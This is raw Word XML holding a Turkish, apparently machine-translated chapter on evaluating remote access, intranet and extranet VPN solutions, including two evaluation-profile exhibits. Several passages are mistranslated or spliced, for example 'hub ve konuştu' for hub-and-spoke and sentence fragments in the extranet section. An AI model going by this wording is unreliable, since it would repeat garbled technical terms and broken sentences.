        <w:t>Merkezileştirilmiş VPN yöneticisine entegre edilmiş uyarı ile masaüstü izinsiz giriş tespiti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Merkezi VPN yöneticisine entegre edilmiş uyarılı dağıtılmış masaüstü güvenlik duvarı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00075CE8">
        <w:t>VPN istemcisi yapılandırmasını kilitleme yeteneği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Şeffaf kullanıcı VPN istemcisi güncellemesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Şifrelenmiş bir bağlantı üzerinden kimliği doğrulanmış VPN istemcisi güncellemesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00075CE8">
        <w:t>Birlikte çalışabilirlik bir gereklilik ise, mevcut endüstri VPN standartlarına bağlılık</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>(Bazı HA çözümleri, oturumları kesintiye uğratmadan bunu yapabilir; diğerleri daha rahatsız edicidir.) Şifreleme hızlandırıcılar - donanım tabanlı şifreleme kartları - arttırmak için bir VPN sunucusuna eklenebilir. Sunucudaki tünel işleme hızı. Şifreleme ivmesi şimdi ağ arabirim kartlarının yonga düzeyinde de uygulanmaktadır. Şifreleme hızlandırması, VPN sunucusu için ayrı ayrı VPN istemci bilgisayarında olduğundan, yine tünellerin toplanmasından dolayı daha önemlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00075CE8">
        <w:t>VPN sunucusunun kapasitesini değerlendirirken, yönetim kolaylığını düşünün. Özellikle, bir yöneticinin operasyonel görevleri gerçekleştirmesi ve otomatikleştirmesi ne kadar kolaydır? Örneğin, yeni tüneller eklemek ne kadar kolay? Ek tünel yapılandırmaları VPN istemcisine otomatik olarak “itilebilir” veya “aşağı çekilebilir” mi?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00075CE8">
        <w:t>Günlük kaydı, raporlama ve uyarı VPN sunucu yönetimi arayüzüne entegre edilmesi gereken önemli bir özelliktir. VPN günlükleri mevcut veritabanlarına ve ağ yönetim sistemlerine aktarılabilir mi? VPN sunucusu gerçek zamanlı kayıt ve uyarı veriyor mu?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kullanıcılar tarafından seçilebilen olayları görsel olarak vurgulamak için filtreler hemen sunucu günlüklerine uygulanabilir mi? Dijital sertifika kullanıyorsanız, hangi sertifika yetkilileri desteklenir? Sertifika talebi ve satın alma işlemi otomatik bir çevrimiçi prosedür mü? Yoksa manuel müdahale gerektiriyor mu? Sertifika talebi ve satın alma gibi tekrarlayan işler otomasyon için doğal adaylardır. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>VPN sunucusu, kullanıcı sertifikalarının geçerliliğini kontrol etmek için otomatik olarak sertifika iptal listeleri talep ediyor mu? Sergi 40.3, uzaktan erişim VPN sunucuları için örnek bir değerlendirme profilini göstermektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E725DF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075CE8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Intranet VPN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bir intranet VPN, bir kurumsal WAN içindeki sabit konumları ve şube ve ev ofislerini birbirine bağlar. Bir intranet VPN bir siteden siteye veya VPN ağ geçidinden VPN ağ geçidine bir topoloji kullanır. Bir intranet VPN'in sağladığı faydalar arasında, ağ altyapısı maliyetlerinde düşüş ve kurum içinde bilgi akışında artış yer alıyor. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E725DF">
        <w:t>Bir intranetin doğası siteden siteye olduğu için, son kullanıcı masaüstleri üzerinde çok az etki vardır. Bir intranet uygulaması için VPN çözümlerini değerlendirmedeki kilit kriterler performans, önceden var olan ağ altyapısıyla birlikte çalışabilirlik ve yönetilebilirliktir. Bir intranet VPN'in teknik avantajları arasında düşük WAN bant genişliği maliyetleri, daha esnek topolojiler (örneğin tamamen örülmüş) ve yeni sitelerin hızlı ve kolay bağlantısı bulunur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E725DF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ek 40.3  Uzaktan Erişim VPN Sunucusu için Değerlendirme Profili</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E725DF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ölçeklenebilirlik (sunucu bağlantı gereksinimlerini karşılayabilir mi?)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Yüksek kullanılabilirlik seçeneklerini destekler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E725DF">
        <w:t>Mevcut kullanıcı kimlik doğrulama sistemleri ile bütünleşir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Donanım tabanlı tünel işleme, şifreleme / şifre çözme hızlandırması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Otomatik kullanıcı doğrulama sürecinin yönetimi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Birlikte çalışabilirlik için endüstri VPN standartlarını destekler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Hangi kimlik doğrulama türleri desteklenir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>VPN sunucusu sertleştirilmiş bir işletim sisteminde çalışıyor mu?</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E725DF">
        <w:t>Hem VPN istemcisi hem de sunucu tarafında güvenlik duvarı entegrasyonu mümkün mü?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Merkezi müşteri yönetimi özellikleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B30EF6">
        <w:t>Masaüstü işletim sistemleri için geniş istemci desteği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Satıcı tarafından sağlanan bir VPN donanım / yazılım sistemi olan uzaktan yapılandırılabilir VPN cihazlarının kullanımı, Yerinde yönetim eksikliği ve hızlı uygulama süresi olacağını belirtti. Değer Donanım, işletim sistemi ve VPN sunucu yazılımını daha geleneksel “kendin yap” yaklaşımını kullanarak entegre etmek için gereken zaman ve çabayı karşılaştırırken VPN cihazlarının kullanımı netleşti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00A54BE0">
        <w:t>Hizmet sınıfı kontrolleri, diğerlerine göre belirli protokolleri önceliklendirmek için trafik mühendisliği yaparken yararlı olabilir. Bu, örneğin iş gereksinimleri belirli VPN trafiği türlerinin diğerlerinden daha az gecikme süresi gerektirmesi gerektiğini zorunlu kıldığı zaman, bir sorun haline gelir. Örneğin, video veya sesli trafik akışı, son kullanıcının beklentileri veya uygulama türünün özellikleri nedeniyle bir dosya aktarımından veya HTTP trafiğinden daha sürekli bir bit hızı gerektirir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">      İnternet üzerinden tünel yapan intranet VPN'lerin genel kullanımı için iki sınırlayıcı faktör gecikme ve garantili bant genişliği eksikliğidir. Bu faktörler uluslararası olarak konuşlandırılmış özel WAN tabanlı intranet VPN'lerini de etkileyebilse de, çoğu şirket İnternet üzerinden düşük VPN maliyetine karşı rekabet edebilmek için yeterli uluslararası özel WAN bant genişliğine sahip olamaz.</w:t>
      </w:r>
      <w:r w:rsidRPr="00074B0F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Bir maliyet / fayda analizi yapmak, özel bir WAN, Internet tabanlı bir intranet VPN veya dış kaynaklı bir VPN servisi kullanıp kullanmamaya karar vermede yardımcı olabilir. Çoklu Protokol Etiketi Anahtarlama (MPLS), veri trafiğini önceliklendirmek için standart bir yol sağlayan bir protokoldür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00074B0F">
        <w:t>VPN'nin topolojisi, intranet VPN'de önemli bir husustur. Birçok intranet VPN, bir kuruluşun bilgi akışının merkezden dağıtılmış doğası nedeniyle bir ağ topolojisi gerektirir. Diğer durumlarda, merkezileştirilmiş bir topoloji, merkezi bilgi akışı durumunda veya uygulanması gereken “merkez ofis” kavramı durumunda belirtilebilir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ağ değişikliklerinin sık olacağı öngörülürse, dinamik yönlendirmeyi ve dinamik VPN yapılandırmasını destekleyen VPN çözümleri belirtilir. Dinamik yönlendirme, ağ adresleme </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">güncellemelerinin VPN'de hızlı bir şekilde yayılması gerektiği, insan müdahalesine gerek kalmadan veya hiç müdahalesine gerek duyulmaması durumunda faydalıdır. Yönlendirme hizmetleri, VPN altyapılarına düşük maliyetli taşıma sağlar Mevcut ağ yapılandırmalarını etkilemeden sağlam bant genişliği yönetimi sağlayanlar. </w:t>
      </w:r>
      <w:r w:rsidRPr="00074B0F">
        <w:t>Dinamik VPN teknolojisi, spontan, kısa ömürlü VPN bağlantısının bir gereklilik olduğu tahmin edildiğinde faydalıdır. Büyük ölçekli dağıtımlarda VPN tünellerini kurmanın idari yükünü hafifletmeyi vaat eden dinamik VPN'ler konusunda halen devam etmekte olan araştırmalar var.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">İnterneti kullanarak bir intranet VPN oluşturmak genel olarak en uygun maliyetli uygulama aracıdır. VPN teknolojisi Bununla birlikte, hizmet seviyeleri, daha önce de belirtildiği gibi, İnternette genellikle garanti edilmez. Hizmet düzeyi garantilerinin eksikliği genel IP trafiği için geçerli olsa da, intranet VPN'leri için evrensel olarak böyle değildir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00074B0F">
        <w:t>Bazı ISS'ler ve özel etiketli IP sağlayıcıları (örneğin, Digital Island) hizmet düzeyi garantileri sunarken, bu teknoloji ancak şu anda olgunlaşıyor; ve bu tür hizmet tekliflerinden en iyi şekilde yararlanmak için, müşteriler genellikle intranetlerini tek bir ISS’nin IP ağının üzerine kurarlar.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bir intranet VPN'i uygularken, işletmelerin garantili hizmet seviyeleri, ağ erişiminin yaygınlığı ve taşıma maliyeti arasında ne gibi bir indirim yapmak istediklerini değerlendirmeleri gerekir. Garantili verim düzeyleri gerektiren işletmeler, VPN'lerini bir ağ servis sağlayıcısının özel uçtan uca IP ağı üzerinden dağıtmayı veya potansiyel olarak Frame Relay'i kurmayı veya kendi özel omurgasını oluşturmayı düşünmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Sergi 40.4, bir intranet VPN için bir dizi değerlendirme kriteri geliştirirken kullanılabilecek bir ürün listesi sunar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000C4572">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ek 40.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Siteden Siteye Intranet VPN için Değerlendirme Profili</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Varsayım: yok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000C4572">
        <w:t>Otomatik politika dağıtımı ve yapılandırması desteği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
          <w:tab w:val="left" w:pos="6585"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ağ topolojisi otomatik yapılandırma, hub ve konuştu topoloji desteği</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
          <w:tab w:val="left" w:pos="6585"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ağ ve servis izleme yeteneği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
          <w:tab w:val="left" w:pos="5535"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Heterojen ağda kullanılıyorsa VPN standartlarına bağlılık</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
          <w:tab w:val="left" w:pos="5535"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000C4572">
        <w:t>Hizmet sınıfı kontrolleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
          <w:tab w:val="left" w:pos="5535"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Dinamik yönlendirme ve tünel kurulum özelliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
          <w:tab w:val="left" w:pos="5535"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ölçeklenebilirlik ve yüksek kullanılabilirlik</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
          <w:tab w:val="left" w:pos="5535"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000C4572" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4536"/>
          <w:tab w:val="left" w:pos="5535"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4572">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Extranet VPN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Extranet VPN'ler, iş ortakları ve müşteriler arasında seçici bilgi akışı sağlar. Yüksek taneli erişim kontrolü ve güçlü kimlik doğrulaması üzerinde durulur. Örneğin, güvenlik yöneticileri, kaynak ve kodlar da dahil olmak üzere birden fazla parametre kullanarak bireysel uygulamalara kullanıcıya özel erişim yetkileri verebilir. Hedef adresler, kimliği doğrulanmış kullanıcı kimliği, kullanıcı grubu, kimlik doğrulama türü, uygulama türü (örneğin, FTP, Telnet), şifreleme türü, gün / saat penceresi ve hatta etki alanı tarafından.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bir extranet VPN, tek bir şirketin tedarik zinciri ve iş ortakları ile bilgi paylaştığı veya Otomotiv Ağı Değişimi gibi bir siteden siteye modelini paylaştığı, merkezi bir site modeli kullanabilir. Kullanıcıdan siteye model kullanıyorsanız, değerlendirme kriterleri, kullanıcı masaüstünün merkezi sitenin kontrolü altında olmaması dışında, uzaktan erişim VPN'lerine benzer. </w:t>
      </w:r>
      <w:r w:rsidRPr="00735EDE">
        <w:t xml:space="preserve">Extranet kullanıcısının bilgisayarı kendi şirketin güvenlik politikasının kontrolü altında olduğundan, kullanıcıların bilgisayarında uygulanan güvenlik politikasında bir çatışma olabilir. Genel olarak, kullanıcı-site modelindeki extranet ortaklarının, kullanıcı masaüstünde güvenlik politikası uygulaması, VPN istemcisi yükleme sorunları, yardım masası, devam eden bakım için bir ortak kullanımı zorunlu kıldığı konusunda bir anlaşmaya varmak için birlikte çalışması gerekecektir. Belirli bir VPN müşterisi ve sorumluluk sorunları, bir ortağın ihmali diğer ortağın </w:t>
      </w:r>
      <w:r w:rsidRPr="00735EDE">
        <w:lastRenderedPageBreak/>
        <w:t>ağının uzlaşmasına yol açmalıdır.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00735EDE">
        <w:t>Bir satıcının VPN istemcisi tarafından desteklenen donanım platformları, uzak extranet ortaklarının kullanacağı olası platformların araştırılmasını gerektiren bir sorun olacaktır. Çoğunlukla, Web tabanlı erişim genellikle extranet ortamlarında tercih edilen yazılım istemcisi olarak kullanılır ve SSL genellikle güvenlik protokolü olarak seçilir. Bu, yüzleşilmesi gereken yapılandırma ve bakım sorunlarını büyük ölçüde basitleştirir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Bir extranet VPN ile gerçekten öyle Tüm katılımcıların aynı ISS'yi kullanıp kullanmadığı önemli değildir, kabul edilebilir hizmet kalitesinin, ISS'nin hangisi tarafından seçildiğine göre sağlandığı varsayılmaktadır. Gereken tek şey, grubun her bir üyesinin İnternet’e bir şekilde erişebilmesi. Her sitedeki VPN yazılımı veya ekipmanı, extranetin ana sitesindeki VPN ekipmanının IP adresiyle yapılandırılmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bir extranet VPN'in çekiciliği, büyük ölçüde pazarları genişletme ve iş ilişkilerinin gücünü artırma yeteneğinden biri olduğundan, pazarlama perspektifinden, extranet istemci yazılımını markalamak istenebilir. Bu, bazı extranet VPN yazılımı ve servis sağlayıcıları ile, extranet giriş noktası olan Web sayfasında (yazılım platformu olarak bir Web tarayıcısı kullanılıyorsa) veya VPN istemcisinin içinde (geleneksel istemci / sunucu yazılımı kullanılıyorsa) yapılabilir. modeli). Tüketici pazarında, extranet VPN'leri alternatif olarak kullanılabilir .Web tarayıcısı tabanlı SSL’ye IPSec VPN'lerin Web tarayıcı tabanlı SSL'ye tercih edileceği bir durum Müşterinin bilinmesi ve siteye birçok kez geri dönmesi muhtemeldir. Başka bir deyişle, bir extranet VPN, insanların bir kez gelebilecekleri bir tüketici katalog ortamında mutlaka çalışmayabilir. Kredi kartı ile alışveriş yapmak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
